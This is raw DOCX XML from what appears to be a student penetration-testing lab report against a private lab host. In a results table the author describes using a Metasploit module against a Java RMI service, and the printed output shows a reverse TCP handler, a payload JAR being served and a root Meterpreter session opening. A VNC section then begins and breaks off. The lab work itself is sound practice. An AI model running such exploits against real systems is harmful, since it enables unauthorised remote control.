    <w:p w14:paraId="6CDFBF98" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164C2A90" wp14:editId="03099961">
            <wp:extent cx="6120130" cy="2190115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2190115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC6118B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="224DC128" wp14:editId="1BF7E7BD">
            <wp:extent cx="6120130" cy="3450590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12"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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3450590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BEDEA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1081FDBA" wp14:editId="65EF87A8">
            <wp:extent cx="6120130" cy="5963920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="5963920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0323D7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82D66F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="39D69CD3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4969264F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="61EF7133" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output (services, ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="3A4E3372" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="794B28AF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Initially, I searched the “java </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rmi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">”, like our service. Then, I got the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>results</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and I started to read the description. Then, I tried 2 potential modules, but I did not get success. After that, I decided to search it in google and saw the </w:t>
            </w:r>
            <w:hyperlink r:id="rId21">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>website</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">. Then, I again searched the modules and noticed that I accidentally, missed one potential module that was in website. So, I used this module, checked the options, set the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>rhosts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> and the port was the same with my service. Then, I run the exploit and got the results: “Meterpreter session 1 opened (192.168.1.96:4444 -&gt; 192.168.1.85:42613) at 2024-05-17 11:56:28 -0400”.  So, now I can use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>controle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> the machine with root privilege “</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5364C034" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5B2E63D4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Server username: root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB8AD29" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50D7BC02" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.96:4444 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F5488D1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:1099 - Using URL: http://192.168.1.96:8080/nRqaxO5R7aM2oVS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6911AFF0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:1099 - Server started.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66976752" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:1099 - Sending RMI Header...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5963AC86" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:1099 - Sending RMI Call...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDE748F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] 192.168.1.85:1099 - Replied to request for payload JAR</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742A70A8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Sending stage (57971 bytes) to 192.168.1.85</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B30CDA7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Meterpreter session 1 opened (192.168.1.96:4444 -&gt; 192.168.1.85:42613) at 2024-05-17 11:56:28 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="02596423" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65186398" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73B1AD7C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A635062" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0F85E4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61902E7A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7353F66D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability [Fifth]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721BA51" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F5A60B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Services: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VNC (protocol 3.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFCE22" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C3DBE6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD7CF76" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553EB197" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612FD1E2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="313435FD" wp14:editId="3B07EB59">
            <wp:extent cx="6120130" cy="2773045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2773045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0293B7C0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39DC9744" wp14:editId="5EA3CEB0">
            <wp:extent cx="6120130" cy="2653030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Image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A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2653030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD02C2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3D1E9D" wp14:editId="3CCC3D5C">
            <wp:extent cx="6120130" cy="3256280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3256280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="405FCDA8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="22F5A3F6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36617648" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
